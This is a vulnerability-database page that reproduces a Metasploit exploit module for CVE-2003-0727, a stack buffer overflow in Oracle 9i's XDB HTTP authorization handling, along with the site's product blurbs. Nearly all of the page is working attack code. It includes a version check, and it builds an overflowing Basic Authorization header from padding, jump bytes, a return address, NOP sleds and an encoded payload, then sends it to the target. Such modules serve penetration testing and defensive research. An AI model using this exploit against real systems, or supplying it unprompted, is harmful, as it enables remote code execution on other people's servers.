Lucene search
+L

Oracle 9i XDB HTTP PASS Overflow (win32)

🗓️ 18 Aug 2003 00:00:00Reported by MC <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 46 Views

Oracle 9i XDB HTTP PASS Overflow (win32) exploi

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Oracle 9i XDB HTTP PASS Overflow (win32)',
        'Description' => %q{
          This module exploits a stack buffer overflow in the authorization
          code of the Oracle 9i HTTP XDB service. David Litchfield,
          has illustrated multiple vulnerabilities in the Oracle
          9i XML Database (XDB), during a seminar on "Variations
          in exploit methods between Linux and Windows" presented
          at the Blackhat conference.
        },
        'Author' => [ 'MC' ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2003-0727'],
          ['OSVDB', '2449'],
          ['BID', '8375'],
          ['URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
        },
        'Privileged' => true,
        'Payload' => {
          'Space' => 400,
          'BadChars' => "\x00",
          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
        },
        'Platform' => 'win',
        'Targets' => [
          [ 'Oracle 9.2.0.1 Universal', { 'Ret' => 0x60616d46 } ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2003-08-18',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(8080)
      ]
    )
  end

  def check
    connect
    sock.put("GET / HTTP/1.0\r\n\r\n")
    resp = sock.get_once
    disconnect

    if (resp =~ /9\.2\.0\.1\.0/)
      return Exploit::CheckCode::Appears('Target appears to be vulnerable')
    end

    return Exploit::CheckCode::Safe('Target is not vulnerable')
  end

  def exploit
    connect

    sploit = rand_text_english(4, payload_badchars) + ":"
    sploit << rand_text_english(442, payload_badchars)
    sploit << "\xeb\x64" + make_nops(2) + [target.ret].pack('V')
    sploit << make_nops(266) + "\xeb\x10" + make_nops(109) + payload.encoded

    req = "Authorization: Basic #{Rex::Text.encode_base64(sploit)}\r\n\r\n"

    res = "GET / HTTP/1.1\r\n" + "Host: #{rhost}:#{rport}\r\n" + req

    print_status("Trying target %s..." % target.name)

    sock.put(res)

    handler
    disconnect
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Aug 2003 00:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 22.1
EPSS0.68395
46